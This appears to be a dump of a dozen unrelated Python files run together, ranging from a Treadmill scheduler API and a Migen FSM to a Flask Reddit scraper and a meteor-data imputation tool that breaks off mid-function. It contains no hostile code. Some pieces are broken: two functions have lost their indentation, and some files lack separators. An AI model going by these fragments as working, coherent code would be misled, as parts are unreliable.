# map month (from the date string) to a season name (values are Korean season labels)
date_dict = {"01":"겨울","02":"겨울","03":"봄", "04":"봄", "05":"봄", "06":"여름", "07":"여름", "08":"여름", "09":"가을","10":"가을","11":"가을","12":"겨울"}
# NOTE(review): assigning a column on a filtered slice can raise pandas'
# SettingWithCopyWarning -- consider .copy() after the isin filter.
data_seoul['Season']=data_seoul.Date.str[5:7].map(date_dict)
print(data_seoul.tail())
data_seoul=data_seoul[data_seoul.Season.isin(['겨울'])]  # keep winter rows only
# # data_seoul.tail()
sns.set(font_scale=1.5)
f, ax = plt.subplots(figsize=(20,10))
sns_heatmap = sns.heatmap(data_seoul.corr(), annot=True, fmt=".2f", linewidths=.5, cmap="RdBu_r")
#%% |
"""
Alias for `phiml.math.magic`
"""
from phiml.math.magic import *
|
import sys
# Mad-libs style story filler: reads a template file where placeholders look
# like [noun-phrase] and prompts the user to fill in each one.
user_inp = input("Please enter the file you want to open")
try:
    file = open(user_inp, "r")
except FileNotFoundError:
    print("Bad File Name Sorry.")
    sys.exit()
story = ""
for line in file:
    # BUG FIX: was `word.split()` -- `word` is undefined on the first
    # iteration (NameError); the text being processed is `line`.
    word_list = line.split()
    for word in word_list:
        if word[0] == "[":
            # extract the placeholder text between the brackets
            last = word.find("]")
            q = word[1:last]
            q = q.replace("-", " ")
            # keep any punctuation that followed the closing bracket
            after = word[(last + 1):]
            # choose the article by the first letter of the prompt
            if q[0] in "aeiou":
                article = "an"
            else:
                article = "a"
            print("Please give", article, q)
            blank = input()
            story += blank + after + " "
        else:
            story += word + " "
file.close()
print("Here's your story:\n")
print("------------------\n")
print(story)
"""Implementation of scheduler reports API.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import fnmatch
import logging
import time
import kazoo.exceptions
from treadmill import context
from treadmill import exc
from treadmill import reports
from treadmill import zknamespace as z
from treadmill import logcontext as lc
from treadmill import scheduler as tm_sched
from treadmill.scheduler import loader
from treadmill.scheduler import zkbackend
_LOGGER = logging.getLogger(__name__)
_CACHE_TIMEOUT = 180 # 3 mins
_LAST_CACHE_UPDATE = 0
_RO_SHEDULER_INSTANCE = None
def get_readonly_scheduler():
    """Return the cached read-only scheduler, rebuilding it when stale."""
    # C0103(invalid-name): invalid variable name
    # W0603(global-statement): using the global statement
    # pylint: disable=C0103,W0603
    global _RO_SHEDULER_INSTANCE, _LAST_CACHE_UPDATE

    cache_expired = time.time() - _LAST_CACHE_UPDATE > _CACHE_TIMEOUT
    if cache_expired or not _RO_SHEDULER_INSTANCE:
        # (Re)build the read-only scheduler snapshot from ZooKeeper.
        tm_sched.DIMENSION_COUNT = 3

        _RO_SHEDULER_INSTANCE = loader.Loader(
            zkbackend.ZkReadonlyBackend(context.GLOBAL.zk.conn),
            context.GLOBAL.cell
        )
        _RO_SHEDULER_INSTANCE.load_model()

        _LAST_CACHE_UPDATE = time.time()

    return _RO_SHEDULER_INSTANCE
def mk_explainapi():
    """API factory function returning _ExplainAPI class."""
    class _ExplainAPI(object):
        """API object implementing the scheduler explain functionality."""
        def __init__(self):
            # get(inst_id) delegates to the module-level _explain helper.
            self.get = _explain
    return _ExplainAPI
class API(object):
    """Scheduler reports API."""
    def __init__(self):
        def get(report_type, match=None, partition=None):
            """Fetch report from ZooKeeper and return it as a DataFrame.

            :param report_type: name of the state-report node in ZooKeeper.
            :param match: optional fnmatch glob applied to the report's
                primary-key column (see _match_by_name).
            :param partition: optional fnmatch glob applied to the
                ``partition`` column.
            :raises KeyError: if no report of that type exists.
            """
            try:
                data, _meta = context.GLOBAL.zk.conn.get(
                    z.path.state_report(report_type)
                )
                df = reports.deserialize_dataframe(data)
                if match:
                    df = _match_by_name(df, report_type, match)
                if partition:
                    df = _match_by_partition(df, partition)
                return df
            except kazoo.exceptions.NoNodeError:
                # Missing ZK node is surfaced as a plain KeyError to callers.
                raise KeyError(report_type)
        self.get = get
        self.explain = mk_explainapi()()
def _match_by_name(dataframe, report_type, match):
"""Interpret match with report type and return resulting DataFrame.
"""
pk_match = {
'allocations': 'name',
'apps': 'instance',
'servers': 'name'
}
match = fnmatch.translate(match)
subidx = dataframe[pk_match[report_type]].str.match(match)
return dataframe.loc[subidx].reset_index(drop=True)
def _match_by_partition(dataframe, partition):
"""Filter out dataframes that don't match partition.
"""
partition = fnmatch.translate(partition)
subidx = dataframe['partition'].str.match(partition)
return dataframe.loc[subidx].reset_index(drop=True)
def _explain(inst_id):
    """Explain application placement.

    Returns a placement report for a *pending* instance.
    Raises exc.NotFoundError for an unknown instance and exc.FoundError
    for an instance that is already placed.
    """
    with lc.LogContext(_LOGGER, inst_id):
        start = time.time()
        ro_scheduler = get_readonly_scheduler()
        _LOGGER.info('ro_scheduler was ready in %s secs', time.time() - start)
        try:
            instance = ro_scheduler.cell.apps[inst_id]
        except KeyError:
            # Unknown instance id.
            raise exc.NotFoundError(inst_id)
        if instance.server:
            # Placement can only be explained while the instance is pending.
            raise exc.FoundError(
                'instance {} is already placed on {}'.format(
                    inst_id, instance.server
                )
            )
        return reports.explain_placement(
            ro_scheduler.cell, instance, 'servers'
        )
|
# --- List basics: indexing, slicing, mutation (tutorial scratch file;
# several lines below raise deliberately and were presumably run one at a
# time, not top-to-bottom) ---
squre = [1,2,3,4,5,6]
print(squre)
squre[0] = "a"
squre.append("asdj")
squre.extend([1,2,4])
print(squre)
ourList = [1,2,3,4,5,6,7,8,9,10]
print(ourList)
print(ourList[0])
print(ourList[-1])
print(ourList[0:9])
print(ourList[:9])
print(ourList[0:])
print(ourList[:])
print(ourList[0:9:2])
print(ourList[::2])
print(ourList[::-1])
'''
'''
# range objects support the same indexing/slicing as lists (Python 3
# prints them as range(...) rather than as a materialized list).
ourList = range(20)
print(ourList)
print(ourList[0])
print(ourList[-1])
print(ourList[0:10])
print(ourList[:13])
print(ourList[0:])
print(ourList[:])
print(ourList[0:10:2])
print(ourList[::2])
print(ourList[::-1])
ourList = [1,2,3,4,5,6,7,8,9,10]
print(ourList)
ourList[0] = "a"
print(ourList)
ourStr = "123"
print(ourStr)
# NOTE: the next line raises TypeError -- strings are immutable.
ourStr[0] = "a"
print(ourStr)
# Adding to a list
example = ["a","b","c","d","e","f"]
example.append("g")
example.append(["h","i"])
example.extend(['j','k'])
example.insert(0,"l")
example.insert(-1,"m")
example.insert(-2,"n")
example.append(example)
print(example)
print(example[-1])
print(example[-1][-1])
# list.append mutates in place and returns None, so this prints None.
print(example.append(example))
example = ["a","b","c","d","e","f"]
print(example)
example.append("g")
print(example[-1])
print(example[-1][-1])
example.append(example)
print(example[-1])
print(example[-1][-1])
example.append(example)
print(example.append(example))
# Removing from a list
example = [1,2,3,4,5,6,7,8,9]
print(example)
print(example.pop())
print(example.pop(3))
example.remove(2)
print(example)
# Searching a list
example = list("helloworld")
print(example)
print(example.count("l"))
print(example.index("o"))
# NOTE: "a" is not in the list, so index() raises ValueError here.
print(example.index("a"))
# Tuple indexing
ourTuple = tuple("0123456789")
print(ourTuple)
print(ourTuple[0])
print(ourTuple[2])
print(ourTuple[-1])
print(ourTuple[0:6])
print(ourTuple[0:])
print(ourTuple[:])
print(ourTuple[:9])
print(ourTuple[0:9:2])
print(ourTuple[::2])
print(ourTuple[::-1])
a = (1,2,3)
# NOTE: raises TypeError -- tuples are immutable.
a[1] = 1
# Tuple methods
a = tuple("hello world")
print(a)
print(a.count("l"))
print(a.index("o"))
# In Python 3 zip() is lazy, so this prints a zip object, not a list.
print(zip((1,2,3),["a","b","c"],"def"))
print({"a":1,"b":2,"c":3})
print(dict([(1,2),("a",1),("b",3)]))
print(dict(zip("abcde",range(1,6))))
print({"a":1,"b":2,"c":3})
# Dict methods
ourDict = dict(zip("hello","12345"))
print(ourDict)
print(ourDict.keys())
print(ourDict.values())
print(ourDict.get("h"))
print(ourDict["o"])
print(ourDict.get("w","not found"))
ourDict.update(w = 3)
print(ourDict.setdefault("w","16"))
print(ourDict.setdefault("h","16"))
print(ourDict)
ourDict = dict(zip("hello","12345"))
print(ourDict)
print(ourDict.pop("h"))
print(ourDict.popitem())
print(ourDict.popitem())
print('2' in ourDict)
print('e' in ourDict)
ourDict.clear()
print(ourDict)
# Copying a dict: .copy() is shallow -- nested objects are shared between
# the copy and the original.
ourDict = {"a":1,"b":2,"c":3,"d":4,"e":5,"1":[1,2]}
otherDict = ourDict.copy()
ourDict["a"] = 3
ourDict["1"][1] = "a"
ourDict["1"] = 3
print(ourDict)
print(otherDict)
ourDict = dict(zip("hello","12345"))
print(ourDict)
# Access by key
print(ourDict["l"])
ourDict["l"] = "hi"
print(ourDict)
print({1:"a","a":{2:3},(1,2):3})
# Dict iteration views
ourDict = dict(zip("hello","12345"))
print(ourDict.items())
print(ourDict.keys())
print(ourDict.values())
# Augmented assignment
num = 5
num += 1 #--->num = num + 1
print(num)
num *= 2 #--->num = num * 2
print(num)
# Comparison operators
print(1<2)
print(1>2)
print(1 == 1.0)
print(1 == 1)
print(1 == 2)
print(1 >= 2)
print(1 <= 2)
print(1 != 2)
print(1 != 1)
# NOTE: `is` compares identity, not equality; on literals it is a
# SyntaxWarning on modern CPython and the result is implementation-defined.
print(2 is 1)
a = 3
b = 3
print(a is b)
print(id(a))
print(id(b))
print(1 is 1.0)
print(id(1))
print(id(1.0))
print("a"is "b")
print("a" is "a")
# Strings compare lexicographically by code point.
print("a" > "b")
print("bacd" > "bcad")
print(ord("a"))
print(ord("A"))
print(chr(97))
print(chr(122))
print(chr(65))
print(chr(90))
# Boolean operators
print(True and True)
print(True and False)
print(False and False)
print(True or True)
print(True or False)
print(False or False)
print(not True)
print(not False)
num = 11
if num < 15:
    if num > 8:# the num > 8 test only runs when num < 15 held
        print("15 > num > 8")
else:
    if num > 17:# the num > 17 test only runs when num >= 15
        print("num > 17")
num = 18
if num < 15:
    if num > 8:# the num > 8 test only runs when num < 15 held
        print("15 > num > 8")
else:
    if num > 17:# the num > 17 test only runs when num >= 15
        print("num > 17")
num = 10
# if/elif is a single decision: once one branch runs, later tests are skipped
if num < 100:
    print("<100")
elif num < 30:
    print("<30")
num = 10
# two separate if statements are independent decisions
if num < 30:
    print("<30")
if num < 100:
    print("<100")
num = 10
if num < 30:
    print("<30")
elif num < 100:
    print("<100")
if num < 100:
    print("<100")
elif num < 30:
    print("<30")
# if / elif / else chain
num = 10
if num == 1: # if num == 1 is true
    print("num is 1")
elif num == 2:
    print("num is 2")
elif num == 3:
    print("num is 3")
else:
    print("I don't know")
# for loops
for num in range(5): # num takes each value of range(5) in turn
    print(num) # loop body, runs once per iteration
for n in "abcde":
    print(n)
    print("so cool")
# tuple unpacking in a for loop
for m,n in [(1,2),(3,4),(5,6)]:# m,n = (1,2) then (3,4) then (5,6)
    print("m:%s"%m)
    print("m:%s"%n)
# enumerate: pairs each element with its index
string = "abcdefg"
enStr = enumerate(string)
print(string)
print(enStr)
for index,string in enStr:
    print(index,string)
# function without parameters
def Say_hello():
    print("hello world")
# function with parameters
Say_hello()
def say_hello(name,age):
    print("hello %s,he is %s years old"%(name,age))
say_hello("feng",18)
def say_hello(name,age):
    print("hello %s,he is %s years old"%(name,age))
say_hello("feng",18)
say_hello(18,"feng")
def say_hello(name,age = 18):
    print("hello %s ,he is %s years old"%(name,age))
say_hello(name = "feong",age = 16)
say_hello(age = 17,name = "feong")
say_hello(name = "feong")
def say_hello(**arges):
    print(arges)
say_hello()
say_hello(a = 1)
say_hello(a = 1,b = 2,c = 3,d = 4, e = 5)
# NOTE: a **kwargs-only signature does not accept positional arguments, so
# the next line raises TypeError.
say_hello(1,2,3)
say_hello(a= 1,b = 2, c = 3)
say_hello(1, b = 2, c = 3)
def say_hello(*arges,**kwd):
    print(arges)
    print(kwd)
say_hello(1,2,3)
def say_hello():
    print("hello world")
def Say_hello():
    return("hello world","nihao")
    # NOTE: unreachable -- this line follows the return statement.
    print("nihao")
print(type(say_hello()))
print(type(Say_hello()))
print(Say_hello())
def hello(a, b):
    """Return the sum of *a* and *b*."""
    return a + b
# BUG FIX: the original called map(hello, ...) BEFORE `hello` was defined,
# raising NameError.  The call now follows the definition, and list() is
# applied so Python 3 prints the mapped values instead of a map object.
print(list(map(hello, range(1, 6), range(6, 11))))
print(hello(1,2))
print(list(map(hello,range(1,3),range(3,5))))
def calc(numbers):
    """Return the sum of squares of an iterable of numbers."""
    sum = 0  # NOTE: shadows the builtin sum()
    for n in numbers:
        sum = sum + n * n
    return sum
# but callers must first assemble a list or tuple:
print(calc([1, 2, 3]))
print(calc((1,3,5,7)))
def calc(*numbers):
    """Return the sum of squares, taking the numbers as variadic args."""
    sum = 0
    for n in numbers:
        sum = sum + n * n
    return sum
print(calc(1,2))
print(calc(1,3,5,7))
# The bare `*` makes city and job keyword-only parameters.
def person(name, age, *, city, job):
    print(name, age, city, job)
print (person('Jack', 24, city='Beijing', job='Engineer'))
def f1(a, b, c=0, *args, **kw):
    print('a =', a, 'b =', b, 'c =', c, 'args =', args, 'kw =', kw)
def f2(a, b, c=0, *, d, **kw):
    print('a =', a, 'b =', b, 'c =', c, 'd =', d, 'kw =', kw)
print(f1(1,2))
print(f1(1,2,c = 3))
print(f1(1,5,3,'a','b'))
print(f1(1,2,6,'a','b',x = 99))
print(f2(1,2,d = 89, ext = None))
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class CinemaItem(scrapy.Item):
    """Item holding one cinema's listing data scraped from the site."""
    # Cinema name
    cinema_name = scrapy.Field()
    # District
    district = scrapy.Field()
    # Image URLs of the movies currently showing
    # (NOTE: 'moive' typo kept -- the field name is the pipeline interface)
    online_moive = scrapy.Field()
    # Address
    address = scrapy.Field()
    # Telephone
    telephone = scrapy.Field()
    # Image URL
    img_url = scrapy.Field()
|
from setuptools import setup, find_packages
from os import path

here = path.abspath(path.dirname(__file__))

# BUG FIX: the encoding was misspelled 'uif-8', which raises LookupError
# the moment setup.py runs.
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()

setup(
    name='aCrawler',
    version='0.0.1',
    url='https://github.com/sumantmani/aCrawler',
    author='Sumant Mani',
    author_email='sumant.mani@outlook.com',
    license='MIT',
    # The README was previously read but never passed to setup().
    long_description=long_description,
    long_description_content_type='text/markdown',
    classifiers=[
        # Classifier strings must match the official trove list exactly;
        # '3 -Alpha' (missing space) is rejected by PyPI.
        'Development Status :: 3 - Alpha',
        'Programming Language :: Python :: 3.6',
    ],
    keywords='A simple web crawler',
    packages=find_packages(exclude=['contrib', 'docs', 'tests']),
    install_requires=[],
    # $ pip install -e .[dev, test]
    extras_require={
        'dev': ['check-manifest'],  # was misspelled 'check-mainfest'
        'test': ['coverage'],
    },
)
|
import tensorflow as tf
# Classic TF 1.x "hello world": build a constant op and evaluate it in a
# Session.
hello = tf.constant("Merhaba, TensorFlow")
sess = tf.Session()  # NOTE(review): TF 1.x API; under TF 2.x this needs tf.compat.v1.Session -- confirm target version
print(sess.run(hello))
|
from flask import Flask, render_template
from bs4 import BeautifulSoup
import json
import urllib
import time
app = Flask(__name__)
@app.route('/')
def main():
    """Render the front page with media pulled from Reddit's front-page JSON.

    NOTE(review): uses the Python 2 ``urllib.urlopen`` API -- this file
    targets Python 2.
    """
    ROOT_URL = 'http://www.reddit.com/'
    page = urllib.urlopen('http://www.reddit.com/.json?limit=80')
    j = json.loads(page.read())
    images = []
    galleries = []
    # pulling image urls and post links from json object
    for c in j['data']['children']:
        if (c['data']['url'][-3:] in ('jpg', 'png', 'gif')) or c['data']['url'][-4:] == 'jpeg':
            # Direct image link: pair it with its Reddit comments permalink.
            images.append([c['data']['url'], ROOT_URL + c['data']['permalink']])
        elif c['data']['url'][7:12] == 'imgur':
            # Imgur gallery: scrape the individual image links from the page.
            imgs = get_imgur_imgs(c['data']['url'])
            if imgs:
                galleries.append(imgs)
    # setting current date and time
    d = time.strftime("%A, %B %d, %Y")
    t = time.strftime("%H:%M:%S")
    return render_template('base.html', date=d, time=t, images=images, galleries=galleries)
def get_imgur_imgs(url):
    """Scrape direct image links from an Imgur gallery page.

    Returns a list of image URLs, or None when the page cannot be fetched
    or contains no recognizable image container.
    """
    img_links = []
    # BUG FIX: the original bare `except:` clauses also swallowed
    # SystemExit/KeyboardInterrupt; catch only the expected errors.
    try:
        htmltext = urllib.urlopen(url).read()
    except IOError:  # network/HTTP failure -- treat the gallery as unavailable
        return None
    soup = BeautifulSoup(htmltext)
    # not all Imgur galleries have div id=image-container
    # this will have to be fixed
    start_div = soup.find('div', {'id': 'image-container'})
    if start_div:
        for tag in start_div.findAll('img'):
            try:
                img_links.append(tag['data-src'])
            except KeyError:  # <img> without a data-src attribute -- skip it
                pass
    else:
        return None
    return img_links
# NOTE(review): debug=True enables Flask's interactive debugger -- fine for
# this local demo, but must not be enabled in production.
app.debug = True
app.run()
#!/usr/bin/env python3
import os
# Put me in the user's crontab
def updateUser():
    """Update user-scope Flatpak apps by shelling out to `flatpak update --user`."""
    os.system("flatpak update --user")
updateUser()
from migen import *
# import tinyPlatform
""" ShiftOut
This reads from memory and shifts out, in parallel, the data for all 8 panels.
This needs to shift 64 bits at a max frequency (theoretically 8MHz) but probably
more likely <=4MHz.
The panels will be rewritten to allow an element of PWM fade control of the tubes.
Therefore, the panels will be rewritten every 10 ms (100Hz).
"""
class ShiftOut(Module):
    """Serially shifts a 64-bit panel buffer out to the panel driver chips,
    paced by the PWM refresh counter.

    BUG FIX: the FSM referenced ``self.buffer``, which was never created
    (``panel_buffer1`` was declared instead and never used), so constructing
    the module raised AttributeError.  The FSM now uses ``panel_buffer1``.
    """
    def __init__(self):
        # Internal signals
        self.PWM_clk = Signal(8)  # free-running counter that paces refreshes
        self.PWM_shift = Signal(1)  # flag to trigger shifting out the data
        self.panel_buffer1 = Signal(64)  # data being shifted out, LSB first
        self.buf_cnt = Signal(7)  # counts the 64 shifted bits
        # GPIO
        # clock, strobe and OE are shared
        self.clock = Signal()
        self.strobe = Signal()
        self.OE = Signal()
        # Each panel has a separate data line
        self.data1 = Signal()
        self.comb += [
            If(self.PWM_clk == 10,
                self.PWM_shift.eq(1),
            )
        ]
        self.sync += [
            self.PWM_clk.eq(self.PWM_clk + 1)
        ]
        self.submodules.shifterFSM = FSM(reset_state='IDLE')
        # IDLE: wait for the PWM refresh flag, then latch a pattern to shift.
        self.shifterFSM.act('IDLE',
            If(self.PWM_shift,
                NextValue(self.OE, 0), # Turns all tubes off while we shift out the data. This prevents ghosting
                NextValue(self.panel_buffer1, 0xAAAAAAAAAAAAAAAA),  # test pattern
                NextValue(self.buf_cnt, 0),
                NextValue(self.strobe, 1),
                NextState('CLOCK')
            )
        )
        self.shifterFSM.act('CLOCK',
            If(self.clock,
                NextValue(self.clock, 0),
                NextState('DATA') # data read on falling edge, so set data in next state
            ).Else(
                NextValue(self.clock, 1),
                NextState('CLOCK_HOLD')
            )
        )
        # DATA: present the LSB of the buffer on the data line, then either
        # finish (64 bits done) or shift and clock out the next bit.
        self.shifterFSM.act('DATA',
            If((self.panel_buffer1 & 0x01),
                NextValue(self.data1, 1)
            ).Else(
                NextValue(self.data1, 0)
            ),
            NextValue(self.buf_cnt, self.buf_cnt + 1),
            If(self.buf_cnt == 64,
                NextValue(self.OE, 1), # Turn the tubes back on
                NextValue(self.strobe, 0),
                NextState('IDLE')
            ).Else(
                NextValue(self.panel_buffer1, self.panel_buffer1 >> 1),
                NextState('CLOCK')
            )
        )
        self.shifterFSM.act('CLOCK_HOLD',
            NextState('CLOCK') # This is just a holding state to waste 1 clock
        )
def counter_test(dut):
    """Idle the simulation for 1000 sync-clock cycles (*dut* is unused)."""
    remaining = 1000
    while remaining:
        remaining -= 1
        yield  # advance the simulation by one clock
if __name__ == "__main__":
    # Build the DUT and dump a VCD trace for inspection (e.g. in GTKWave).
    dut = ShiftOut()
    run_simulation(dut, counter_test(dut), vcd_name="shift.vcd")
|
import time
from subprocess import Popen, PIPE
prog = Popen("~/Desktop/Drone/reader.py", shell=True, stdin=PIPE, stdout=PIPE)
prog.stdin.write("This will go to script A\n")
print prog.stdout.read()
prog.wait()
|
"""
-------------------------------------------------------------------------------
Name: DataChaser
Format: .py
Autors:
-Saúl Contreras (SuulCoder)
-Luis Quezada (Lfquezada)
-Marco Fuentes (marcofuentes05)
'Fireball_And_Bolide_Reports.csv'
Use:
This program is useful to recover the data that has been lost by
some sensors of the Nasa. This is a proyect for the SpaceApp
Challege 2019. This algorithm uses a Machine Learning
process, libraries from Python and statistics regressions.
-------------------------------------------------------------------------------
"""
#Import all libraries
import pandas as pd #import the pandas module
import numpy as np
import csv
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures # So that we can work with non linear models
#------------------------------------------------------------------------------
class Value(object):
    """This class represents a value that has uncertainty.

    The objective of this class is to reduce the uncertainty based on
    different models given by the user: from possible values with an
    uncertainty, converge toward a value with less uncertainty.

    attributes:
        -value: float, the current best estimate
        -bottom: float, lower limit of the uncertainty interval
        -top: float, upper limit of the uncertainty interval
    methods:
        -add
        -getBottom
        -getTop
        -getValue
    """
    def __init__(self, value,bottom,top):
        super(Value, self).__init__()
        self.value = value
        self.bottom = bottom
        self.top = top
    def add(self,value,bottom,top):
        """add: This method receives the following parameters:
            value: float type with a possible value
            bottom: its low uncertainty
            top: its high uncertainty
        Merges a new candidate interval into this Value, narrowing the
        stored uncertainty interval and updating the estimate.

        NOTE(review): the `value` parameter itself is unused -- the new
        estimate is always the interval midpoint; confirm this is intended.
        """
        # A zero-width interval (bottom == top) is treated as exact and is
        # never changed by further observations.
        if(self.bottom!=self.top):
            # Interval-merge cases: fully contained, overlapping from one
            # side, or fully containing the stored interval.
            if(self.bottom<=bottom and self.top>=top):
                self.bottom=bottom
                self.top=top
            elif((self.bottom>bottom and self.top>=top and top>self.bottom) or (self.bottom<=bottom and self.top<top and bottom>self.top)):
                self.top=top
            elif((self.bottom<=bottom and self.top<top and bottom<self.top) or (self.bottom>bottom and self.top>=top and top<self.bottom)):
                self.bottom=bottom
            elif(self.bottom>bottom and self.top>=top):
                self.bottom=bottom
            # New estimate is the midpoint of the (possibly narrowed) interval.
            self.value=((self.bottom+self.top)/2)
    def getValue(self):
        return self.value
    def getBottom(self):
        return self.bottom
    def getTop(self):
        return self.top
#------------------------------------------------------------------------------
class Chaser(object):
    """This class represents the chaser that does all the logic for a
    specific incomplete dataset stored in a .csv document.

    attributes:
        -filename: path of the input .csv file
        -trainData: complete rows used as regression training data
        -currentData: column-major matrix being filled in (Value or '')
        -titles: titles of the floating-point columns
        -allTitles: titles of every column, regardless of type
    methods:
        -trainDataBuilder
        -LinearRegression
        -Transposed
        -getDataToChase
        -store
    """
    def __init__(self, filename,saveFile):
        super(Chaser, self).__init__()
        self.filename = filename
        self.trainData = []
        self.saveFile = saveFile
        self.currentData = []
        self.titles = []
        self.allTitles = []
        self.indexes = []
        self.index = []
        self.realData = []
    def trainDataBuilder(self):
        """
        Collects every row with no missing fields as regression training
        data, writes that subset to 'trainData.csv', and returns the list
        of float-column titles.
        """
        data = []
        allTitles = []
        titles = []
        index = []
        with open(self.filename) as csv_file:
            csv_reader = csv.reader(csv_file, delimiter=',')
            line = 0
            for row in csv_reader:
                if(line==0):
                    # First row holds the column titles.
                    allTitles=row
                else:
                    # Only keep rows with no empty cells.
                    control = True
                    for element in row:
                        if(element==''):
                            control = False
                    if(control):
                        count = 0
                        currentRow = []
                        for element in row:
                            try:
                                # Keep only cells parseable as floats, and
                                # remember which columns those are.
                                currentRow.append(float(element))
                                if(index.count(count)==0):
                                    index.append(count)
                                if(titles.count(allTitles[count])==0):
                                    titles.append(allTitles[count])
                            except:
                                pass
                            count+=1
                        data.append(currentRow)
                line+=1
        with open('trainData.csv', mode='w') as data_file:
            data_file = csv.writer(data_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
            data_file.writerow(titles)
            for currentData in data:
                data_file.writerow(currentData)
        self.trainData = self.Transposed(data)
        self.titles = titles
        self.allTitles = allTitles
        self.index = index
        return titles
    def Transposed(self,matrix):
        """Return the transpose of *matrix*; assumes it is rectangular."""
        try:
            return [[matrix[j][i] for j in range(len(matrix))] for i in range(len(matrix[0]))]
        except Exception as e:
            print("""Please check that the data is correct or:
            -eliminate the category that contains floats and strings at the same time.
            -eliminate the category that has strings and empty spaces at the same time""")
    def dataParser(self,fileName):
        """Parse *fileName* into a list of {title: raw-string} dicts."""
        data = []
        with open(fileName) as csv_file:
            csv_reader = csv.reader(csv_file, delimiter=',')
            line = 0
            for row in csv_reader:
                objInfo = {}
                if line == 0:
                    titles = row
                else:
                    for i in range(len(row)):
                        objInfo[titles[i]] = row[i]
                    data.append(objInfo)
                line += 1
        print(f'{line} events processed.')
        return data
    def printData(self,data):
        """
        print all parsed data
        """
        for event in data:
            for title,info in event.items():
                print(f'{title}: {info}')
            print('\n')
    def getDataToChase(self):
        """
        Get data to chase, the data to complete
        """
        realData = []
        data = self.dataParser(self.filename)
        Parsedlist = [] #Getting all the information in lists
        for event in data:
            trainList = []
            realList = []
            for title,info in event.items():
                realList.append(info)
                try:
                    # Numeric cells become exact Value objects; empty cells
                    # stay as '' placeholders to be filled in later.
                    trainList.append(Value(float(info),float(info),float(info)))
                except:
                    if(info==''):
                        trainList.append('')
            Parsedlist.append(trainList)
            realData.append(realList)
        self.realData = realData
        self.currentData = self.Transposed(Parsedlist)
    def LinearRegression(self):
        """
        This function will get all possible values for the empty spaces
        based on linear regression.  Candidate values are merged into
        self.currentData as Value objects with uncertainty 1 - R^2.
        """
        file = pd.read_csv ('trainData.csv', sep=',')
        model = LinearRegression()
        result = []
        for i in range(0,len(self.titles)):
            indexes = []
            for j in range(0,len(self.titles)):
                if(i!=j):
                    X = file.iloc[:, i].values.reshape(-1, 1) # values converts it into a numpy array
                    Y = file.iloc[:, j].values.reshape(-1, 1) # -1 means that calculate the dimension of rows, but have 1 column
                    model.fit(X, Y) # perform linear regression
                    unc = 1-model.score(X, Y)
                    if(j==0):
                        count = 0
                        for element in self.currentData[i]:
                            if(element==''):
                                indexes.append(count)
                                try:
                                    t = (model.coef_)*(self.currentData[j][count].getValue())+model.intercept_
                                    t = t[0][0]
                                    # NOTE(review): rebinding `element` does not
                                    # write back into currentData -- verify.
                                    element = Value(t,t-(unc*t),t+(unc*t))
                                except:
                                    pass
                            count+=1
                    else:
                        self.indexes = indexes
                        for index in indexes:
                            if(self.currentData[j][index]!=''):
                                t = (model.coef_)*(self.currentData[j][index].getValue())+model.intercept_
                                t = t[0][0]
                                try:
                                    self.currentData[i][index].add(t,t-(unc*t),t+(unc*t))
                                except:
                                    self.currentData[i][index] = Value(t,t-(unc*t),t+(unc*t))
    def quadraticRegression(self):
        """Same as LinearRegression but fits a degree-2 polynomial model."""
        file = pd.read_csv ('trainData.csv', sep=',')
        pf = PolynomialFeatures(degree = 2)
        result = []
        for i in range(0,len(self.titles)):
            indexes = []
            for j in range(0,len(self.titles)):
                if(i!=j):
                    X = file.iloc[:, i].values.reshape(-1, 1) # values converts it into a numpy array
                    Y = file.iloc[:, j].values.reshape(-1, 1) # -1 means that calculate the dimension of rows, but have 1 column
                    X_1 = pf.fit_transform(X.reshape(-1,1))
                    model = LinearRegression()
                    model.fit(X_1, Y) # perform linear regression
                    # print(str(model.coef_))
                    unc = 1-model.score(X_1, Y)
                    if(j==0):
                        count = 0
                        for element in self.currentData[i]:
                            if(element==''):
                                indexes.append(count)
                                try:
                                    # NOTE(review): with 2-D Y, model.coef_ has
                                    # shape (1, n), so coef_[2] likely raises and
                                    # the bare except silently skips -- verify.
                                    t = (model.coef_[2])*(self.currentData[j][count].getValue())**2 + (model.coef_[1])*(self.currentData[j][count].getValue())+model.intercept_
                                    t = t[0][0]
                                    element = Value(t,t-(unc*t),t+(unc*t))
                                except:
                                    pass
                                count+=1
                    else:
                        self.indexes = indexes
                        for index in indexes:
                            if(self.currentData[j][index]!=''):
                                t = (model.coef_)*(self.currentData[j][index].getValue())+model.intercept_
                                t = t[0][0]
                                try:
                                    self.currentData[i][index].add(t,t-(unc*t),t+(unc*t))
                                except:
                                    self.currentData[i][index] = Value(t,t-(unc*t),t+(unc*t))
    def cubicRegression(self):
        """Same as LinearRegression but fits a degree-3 polynomial model."""
        file = pd.read_csv ('trainData.csv', sep=',')
        pf = PolynomialFeatures(degree = 3)
        result = []
        for i in range(0,len(self.titles)):
            indexes = []
            for j in range(0,len(self.titles)):
                if(i!=j):
                    X = file.iloc[:, i].values.reshape(-1, 1) # values converts it into a numpy array
                    Y = file.iloc[:, j].values.reshape(-1, 1) # -1 means that calculate the dimension of rows, but have 1 column
                    X_1 = pf.fit_transform(X.reshape(-1,1)) #Makes it polynomial
                    model = LinearRegression()
                    model.fit(X_1, Y) # perform linear regression
                    unc = 1-model.score(X_1, Y)
                    if(j==0):
                        count = 0
                        for element in self.currentData[i]:
                            if(element==''):
                                indexes.append(count)
                                try:
                                    # NOTE(review): see quadraticRegression --
                                    # coef_[3] indexing is suspect; verify.
                                    t = (model.coef_[3])*(self.currentData[j][count].getValue())**3 +(model.coef_[2])*(self.currentData[j][count].getValue())**2 + (model.coef_[1])*(self.currentData[j][count].getValue())+model.intercept_
                                    t = t[0][0]
                                    element = Value(t,t-(unc*t),t+(unc*t))
                                except:
                                    pass
                                count+=1
                    else:
                        self.indexes = indexes
                        for index in indexes:
                            if(self.currentData[j][index]!=''):
                                t = (model.coef_)*(self.currentData[j][index].getValue())+model.intercept_
                                t = t[0][0]
                                try:
                                    self.currentData[i][index].add(t,t-(unc*t),t+(unc*t))
                                except:
                                    self.currentData[i][index] = Value(t,t-(unc*t),t+(unc*t))
    def isLike(self,current, toCompare,param):
        """
